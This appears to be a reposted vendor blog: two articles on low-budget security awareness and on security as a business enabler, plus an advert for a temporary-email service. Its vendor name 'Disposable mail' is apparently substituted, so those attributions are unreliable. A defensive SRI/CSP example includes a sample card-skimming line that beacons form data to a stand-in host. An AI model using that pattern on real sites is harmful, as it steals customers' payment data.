8 ways to create better cybersecurity awareness with a limited budget

Not all cybersecurity budgets are created equal. For some that means having too many or too few tools; for others it means having few employees, or being the lone ranger responsible for raising security awareness in the company. Here are options that fit every budget:

Cybersecurity on a budget

Invest in VPN to protect your peers and staff

This seems like a no-brainer, but a VPN should be standard for every organization, especially now that cloud services and remote work are the norm. Not every WiFi hotspot can be trusted, yet one cannot expect employees to stop working because the only available connection is an untrusted one; a VPN tunnels their traffic past the hotspot to an endpoint you control. But how can you demonstrate the value to your board or management? Try setting up a “trustworthy” WiFi pineapple at your next company party for a live demonstration of a Man In The Middle attack. Yes, a rogue access point is still a threat even with HTTPS: it sees every DNS query and destination hostname, it intercepts any connection that starts over plain HTTP, it can downgrade sites that do not enforce HSTS, and its captive-portal login page is a convenient place to harvest credentials. Note that the VPN only protects the path to its own endpoint, so it complements HTTPS and HSTS rather than replacing them.

Assess assets with an Incident Response Plan

If an attacker were detected in your systems this very moment, what would your next step be? An incident response plan that is written down, communicated and rehearsed lets you respond calmly and methodically, knowing which systems are backed up and what action to take. Assuming that someone already has access to your systems, and preparing for how you will respond, is the best way to stay on top of threats.

With this in your toolbox, you can also show stakeholders which information could be compromised if an attacker got into system “X” or “Y”. Best of all, it does not require external resources to produce, and if you don’t know where to start, here is our guide on how to build an Incident Response Plan.

Implement a responsible disclosure program

There is a lot of talk about bug bounty programs and leveraging the knowledge of ethical hackers, but running a full program comes with a price tag and a demand for engineering time to fix the complex issues that skilled bug bounty hunters will find. Without being able to show the value or ROI first, how can you get the budget you need?

We recommend starting with a responsible disclosure policy on your site. It invites ethical hackers to report vulnerabilities without fear of legal repercussions, and they do so out of goodwill. At a minimum the policy should state what is in scope, where to send a report, that good-faith research will not be prosecuted, and how long you need before a finding may be published. With knowledgeable staff this can be set up without external resources, and the vulnerability reports you receive are real data about your security posture. That data can also make an informed case for future improvements such as a bug bounty program, more frequent pentesting or an automated scanning solution. Need inspiration? Disposable mail has a publicly available responsible disclosure policy in place.
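The usual way to make such a policy discoverable is a security.txt file at /.well-known/security.txt, the format standardised in RFC 9116. The following is an added example written for this article, not code from Disposable mail or from any policy it publishes: it renders a minimal file and validates one, checking the mistakes that make a disclosure contact unusable (a bare e-mail address instead of a mailto: URI, a plain-http policy link, an expiry date in the past). All addresses, URLs and dates in it are constructed.

```python
"""security.txt helper for a responsible disclosure policy (added example).

RFC 9116 defines /.well-known/security.txt so that researchers can find
where to report a vulnerability.  Every URL, address and date below is
constructed for illustration; none of it is the policy referred to above."""
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Contact and Expires are mandatory in RFC 9116; the rest are optional.
REQUIRED = {"Contact", "Expires"}
KNOWN = REQUIRED | {"Acknowledgments", "Canonical", "CSAF", "Encryption",
                    "Hiring", "Policy", "Preferred-Languages"}
# Fields whose values are web links and therefore must use https
# (Encryption is left out: it may be a dns: or openpgp4fpr: URI).
WEB_URL_FIELDS = ("Acknowledgments", "Canonical", "CSAF", "Hiring", "Policy")


def build_security_txt(contact: str, policy: str, expires: datetime, canonical: str) -> str:
    """Render a minimal security.txt; expires is written as an ISO 8601 UTC timestamp."""
    stamp = expires.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return "\n".join([
        "# Where and how to report security issues in our services.",
        f"Contact: {contact}",
        f"Expires: {stamp}",
        f"Policy: {policy}",
        f"Canonical: {canonical}",
    ]) + "\n"


def parse_security_txt(text: str) -> Dict[str, List[str]]:
    """Parse 'Name: value' lines into {name: [values]}; comments and blank lines are skipped."""
    fields: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"malformed line: {raw!r}")
        name, _, value = line.partition(":")
        fields.setdefault(name.strip(), []).append(value.strip())
    return fields


def validate_security_txt(text: str, now: Optional[datetime] = None) -> List[str]:
    """Return the list of problems found; an empty list means the file is acceptable."""
    now = now or datetime.now(timezone.utc)
    try:
        fields = parse_security_txt(text)
    except ValueError as exc:
        return [str(exc)]
    problems: List[str] = []
    present = set(fields)

    for name in sorted(REQUIRED - present):
        problems.append(f"missing required field: {name}")
    for name in sorted(present - KNOWN):
        problems.append(f"unknown field: {name}")

    # Contact must be a URI; a bare e-mail address without mailto: is a common mistake.
    for value in fields.get("Contact", []):
        if urlparse(value).scheme not in ("mailto", "tel", "https"):
            problems.append(f"Contact must be a mailto:, tel: or https: URI, got {value!r}")

    # Web links in the file must be https, otherwise a network attacker could rewrite them.
    for name in WEB_URL_FIELDS:
        for value in fields.get(name, []):
            if urlparse(value).scheme != "https":
                problems.append(f"{name} must be an https URL, got {value!r}")

    # Expires: exactly once, valid ISO 8601, in the future, and not more than a year out.
    expires = fields.get("Expires", [])
    if len(expires) > 1:
        problems.append("Expires must appear exactly once")
    elif expires:
        try:
            exp = datetime.fromisoformat(expires[0].replace("Z", "+00:00"))
        except ValueError:
            problems.append(f"Expires is not ISO 8601: {expires[0]!r}")
        else:
            if exp.tzinfo is None:
                exp = exp.replace(tzinfo=timezone.utc)
            if exp <= now:
                problems.append("file has expired; researchers will assume it is unmaintained")
            elif exp - now > timedelta(days=366):
                problems.append("Expires is more than a year away; RFC 9116 recommends less")
    return problems


def demo() -> Tuple[List[str], List[str]]:
    """Validate one well-formed and one sloppy file against a fixed clock (June 2019)."""
    now = datetime(2019, 6, 1, tzinfo=timezone.utc)
    good = build_security_txt(
        contact="mailto:security@example.com",  # assumed addresses and URLs throughout
        policy="https://example.com/security/disclosure-policy",
        expires=now + timedelta(days=180),
        canonical="https://example.com/.well-known/security.txt",
    )
    # Three mistakes: bare e-mail address, plain-http policy link, expiry in the past.
    sloppy = ("Contact: security@example.com\n"
              "Policy: http://example.com/security\n"
              "Expires: 2018-12-31T23:59:59Z\n")
    return validate_security_txt(good, now), validate_security_txt(sloppy, now)


if __name__ == "__main__":
    ok, bad = demo()
    print("well-formed:", ok or "no problems")
    for problem in bad:
        print("sloppy:", problem)
```

Run the validator against your own file from a cron job as well as at deploy time: the Expires field is the check most teams forget, and an expired security.txt tells a researcher that nobody is reading the mailbox behind it.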


Threat modelling before it happens

Threat modelling has traditionally been done by security teams, and with the rise of DevOps it is being incorporated into developer workflows as well. Using this technique, a team lists the assets, the threats and the vulnerabilities in a piece of software. It answers what exactly needs to be protected, which external and internal threats to protect against, and which weaknesses exist that need to be fixed, so that fixes can be prioritized by the damage a threat could do to an asset. The exercise can also be run with non-security team members to get them into the mindset of continuous improvement and protection of assets.

Automated web vulnerability scanning

In 2018, our Disposable mail Crowdsource white hat hackers submitted almost 450 new vulnerabilities to broaden the coverage of our web vulnerability scanner. From Crowdsourced modules alone, we had 50,000+ vulnerability findings in our clients’ scanned assets. You can imagine all the JIRA tickets that had to be issued and handled, and it gave security managers a helpful overview of the security status of their web applications. The vulnerability reports summarize what a hacker could exploit, so managers can prioritize remediation accordingly in their workflows.

Using an automated web vulnerability scanner saves the time spent detecting known vulnerabilities and gives your security team more time to dig for issues that require creativity and cannot be automated. A modest investment in a web application scanner costs far less than the multi-million or billion-user breaches seen in 2018.

Results from automated scanning show the security status of your web applications over time, and comparing them with the results of annual security audits and penetration tests gets more value out of the latter: the testers can spend their days on what the scanner cannot find.

Security training as part of employee on-boarding

One way to scale up security awareness in an organization is to include it in the on-boarding process and educate employees outside of the core security team. For some that could mean everyone besides the CISO. However, there’s a growing trend for developers and designers to care about application security (in fact that’s how Disposable mail got started!) and supporting them on this journey is valuable. Here are some ways to make security skills accessible:

  • Host internal knowledge sessions and provide a working environment where developers can hack their own code
  • Build up security champions
  • Employee-led sessions on how to hack or learn about information security
  • Eliminate the blame game when a security issue occurs and encourage ownership of writing secure code
  • Run Capture-the-Flag (CTF) events for participants to practice offensive and defensive coding skills

Developers aren’t the only ones who need training. Be sure to include training people of all levels from interns to C-level on the real-life implications of phishing, password management and social engineering.

Sharing knowledge is caring for colleagues

Even a security company needs to encourage better security practices among its staff, but not everyone has time for 1-to-1 sessions to communicate it all. At Disposable mail, we have been able to scale up security knowledge sharing by creating explanatory videos on the OWASP Top 10 and other well-known vulnerabilities on the Disposable mail YouTube channel, for colleagues and anyone else interested in security. We also hold internal lightning talks on our security test updates, hack demos and weekly security tips from our security researchers to encourage everyone to think security-first.

Start an internal RSS feed or channels for security news and interesting write-ups

With the rise of digital workplaces like Facebook Workplace and Slack, it is easy today to share interesting articles and learning resources. To build up a security mindset in the workplace, you could set up RSS feeds that automatically post news from your trusted security channels, such as the popular Reddit community /r/netsec, or get immediate notifications when research articles from Disposable mail Labs are published (you knew we had to mention that!).

Final thoughts

Building up security awareness or a security culture is not a cut-and-paste job, but with some of the tools and internal learning resources mentioned here, adoption may be easier. Some things are worth paying for, like a VPN or an online vulnerability scanner that takes care of the tedious and easily preventable issues, while there are many ways to be resourceful when creating cybersecurity awareness. Lastly, all levels of the organization should be aware of security risks and plan as if someone is already in.

Curious to see how the Disposable mail automated web vulnerability scanner can make security easier for you? Get started today with a free trial and check your web applications for 1000+ known vulnerabilities.


Author:
Jocelyn Chan

Temp Mails (https://tempemail.co/) is a new free temporary email address service. It provides you with random email addresses that last 10 minutes. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Cybersecurity from an overhead cost to a business enabler

Implementing cybersecurity projects shouldn’t be judged only on return on investment, or be viewed purely as a cost. There is a better way to evaluate them: businesses should be asking how cybersecurity adds business value and enables company growth. The landscape is changing, security is increasingly seen as a competitive advantage, and in some industries it is a reason customers choose to do business with a brand. We discuss 5 ways cybersecurity can be a business enabler:


Gain a competitive edge with cybersecurity and acquire bigger accounts.

If your company is a supplier, having a good understanding of the security status of your applications is crucial. It’s 2019, and it is imperative to know your own security status, because no one wants to be the weak link in the supply chain.

If you are using an automated web app scanner like Disposable mail, you can get detailed reports on the security status of your products and continuously monitor your web applications. This gives customers peace of mind that security is part of your company culture and that the proverbial doors are kept shut at your end of the supply chain. You may even gain a competitive edge, as it makes your offering look less risky to the buyer and can expedite procurement, especially with enterprises that are likely to have information security requirements.

Some companies require vendors to complete security questionnaires as part of the process. Knowing your answers in detail will streamline the procurement process. Here is some insight from Paul Langley, Information Security Manager at Loopio, an RFP response software provider:

“If you are in the B2B space and you want to win big enterprise deals, you need to provide some sort of assurance of your security practices. Prospects and customers want to know that the data they are trusting you with will be secure, along with meeting specific legal, regulatory and compliance requirements they may have.

Your responses to security questionnaires should provide maximum value and answer questions in as much detail as possible, saving time from follow-up questions and further evidence requests. A simple ‘yes’ or ‘no’ will not always be sufficient. Having a standard approach to security questionnaires can also buy time before your company needs to perform a third party security audit or certification (SOC 2, ISO 27001, CSA, etc.).”

Know your third-party applications and their security status. 

Third-party applications are commonly added to better understand customers and website interactions, and to automate processes such as customer service chatbots on a landing page. Doing so helps you understand customer behaviour and scale up business activities, adding more customers into the figurative funnel, but can it backfire?

In the 2018 Ponemon Institute annual survey, 59% of respondents had experienced a data breach caused by a third party, while 22% admitted they were not sure whether a breach had happened at all. These numbers make sense when you recall that the 2018 headlines included Magecart, the malicious third-party JavaScript injected into the web applications of large companies including British Airways and Ticketmaster.

Your main application may be secure, but cybercriminals now get into companies through their third-party suppliers and find the back doors from there. A script loaded from a vendor’s domain runs with the same privileges in the browser as your own code, so it can read every form field on the page. Third-party applications may be key to scaling up operations, but do your due diligence on their security status, pin what you load where you can, and monitor the data that is transferred out of the page, to avoid becoming an embarrassing headline.
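Two browser-side controls address exactly the failure mode described above: Subresource Integrity (SRI) makes the browser refuse to run a vendor script whose content has changed since you pinned it, and a Content-Security-Policy limits where any script on the page may send data. The following is an added example written for this article, not code from Disposable mail, from any vendor or from the incidents named above; the script bodies, hostnames and report endpoint are constructed, and the skimmer line is a stand-in for what a tampered file might contain, not a real Magecart payload.

```python
"""Subresource Integrity pins and a Content-Security-Policy for third-party
scripts (added example, not vendor code).  The script bodies, hostnames and
report endpoint are constructed for illustration."""
import base64
import hashlib
import hmac
from typing import Dict, List


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return an SRI integrity value, e.g. 'sha384-<base64 digest>', for a script body."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI allows only sha256, sha384 and sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Emit a <script> tag the browser will refuse to execute if the fetched body changes.
    crossorigin="anonymous" is required for SRI on cross-origin scripts, so the vendor
    must send CORS headers; if it does not, SRI cannot be used for that script."""
    return f'<script src="{src}" integrity="{sri_hash(body)}" crossorigin="anonymous"></script>'


def verify_sri(body: bytes, integrity: str) -> bool:
    """Check a fetched body against a pinned value, as the browser does before executing it.
    Useful server-side too: a nightly job can refetch pinned vendor scripts and alert on change."""
    algo, _, _ = integrity.partition("-")
    try:
        return hmac.compare_digest(sri_hash(body, algo), integrity)
    except ValueError:
        return False


def build_csp(script_hosts: List[str], connect_hosts: List[str], report_uri: str) -> str:
    """Build a CSP header value.  script-src limits where code may come from; connect-src,
    img-src (via default-src) and form-action limit where a compromised script could send
    what it has read from the page, which is the exfiltration step of a Magecart-style attack."""
    directives = [
        "default-src 'self'",
        "script-src 'self' " + " ".join(script_hosts),
        "connect-src 'self' " + " ".join(connect_hosts),
        "form-action 'self'",
        "object-src 'none'",
        "base-uri 'self'",
        f"report-uri {report_uri}",
    ]
    return "; ".join(directives)


def demo() -> Dict[str, object]:
    """Pin a constructed vendor widget, then show that a tampered copy fails the check."""
    vendor_js = b"window.chatWidget={init:function(){/* constructed vendor script */}};"
    # A skimmer appended to the same file: reads the card field and beacons it elsewhere.
    tampered = vendor_js + (b"\nnew Image().src='https://skimmer.invalid/c?'"
                            b"+encodeURIComponent(document.forms[0].card.value);")
    integrity = sri_hash(vendor_js)
    return {
        "tag": script_tag("https://cdn.vendor.example/widget.js", vendor_js),  # assumed URL
        "original_ok": verify_sri(vendor_js, integrity),
        "tampered_ok": verify_sri(tampered, integrity),
        "csp": build_csp(["https://cdn.vendor.example"],
                         ["https://api.vendor.example"], "/csp-report"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

SRI only works for scripts served from a stable, versioned URL; tag managers and analytics snippets that change on every release cannot be pinned, and for those the CSP connect-src and default-src restrictions, plus a regular diff of what the vendor actually serves, are the remaining controls. Start the policy in Content-Security-Policy-Report-Only and read the reports before enforcing it, otherwise a forgotten third-party host breaks the checkout page instead of protecting it.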

Develop faster. Stay Agile AND secure.

Historically, security has been seen as a compliance function and a cost center, but there is a way to turn the dialogue around. Turning security into a business enabler is a hot topic now, and it begins with a shift in how the added business value of cybersecurity is communicated. For many B2C companies, this means connecting with intrinsic customer needs like personal security. Training developers to consider the security needs of the customer can mean added value in applications, a better user experience and fewer fires to put out. Cybersecurity shouldn’t stop a company from scaling; it should scale together with development. This can be achieved by automating some of the security checks, such as code scanning and testing, while security teams work closely with developers to design with security in mind during the CI/CD cycle.

Even if you don’t have a security manager, developers can still be equipped with automated tools like Disposable mail, use threat modelling and take part in internal training on common vulnerabilities like the OWASP Top 10. They can seem trivial to some, but even a common vulnerability like XSS or a misconfigured S3 bucket can lead to customer information or company user details being leaked and misused. With the right checks in place, security becomes a value-add: smoother customer experiences, fewer bug fixes and faster development.

Flaunt your cybersecurity as a USP to win end-users.

The banking sector has been using cybersecurity as a way to strengthen its business and win customers over. Money sits close to personal privacy, and many new products and companies are entering similarly sensitive areas, such as IoT. There is a concern that risk is being introduced into private homes, workplaces and commutes, which also opens up an opportunity for businesses in these sensitive markets to use product security as a competitive advantage.

Besides these personal possessions, children’s personal information in web and mobile apps is also at risk, which is something Pokemon GO recognized and turned into business value. The company used the security of the game to reassure parents that it was safe for children to play, and still earned $795 million in 2018, a 35% increase on the previous year.

Cybersecurity transparency for retention.

GDPR requires that personal data is stored and processed securely, and it requires companies to notify the supervisory authority of a breach within 72 hours of becoming aware of it, and to inform the affected individuals without undue delay when the breach is likely to put them at high risk. Without the right communication, customers may begin to think there is more to the story and that something is being hidden. This could backfire, losing you valued customers, and even land you a hefty fine or a PR headache. Should a data breach occur, there is an opportunity to respond with transparency, diligence and urgency and show that your brand is customer-centric and concerned with data protection.

How does Disposable mail help?

Start by securing every web application where there is a possibility of user interaction. Automating this with a web application scanner and domain monitoring service like Disposable mail can get you started on this path. Besides common vulnerabilities like the OWASP Top 10, you can also test for the more creative exploits submitted by the Disposable mail Crowdsource white hat hackers. Once you have a more fluid and structured way of working with web security and connecting it to business value, it can scale together with the business and enable faster and better growth.

Have you included an automated DAST solution as part of your cybersecurity strategy? If not, it is easy to get started with the Disposable mail automated web application scanner by signing up for a free 14-day trial. No credit card is required, and you’ll be up and scanning within minutes.
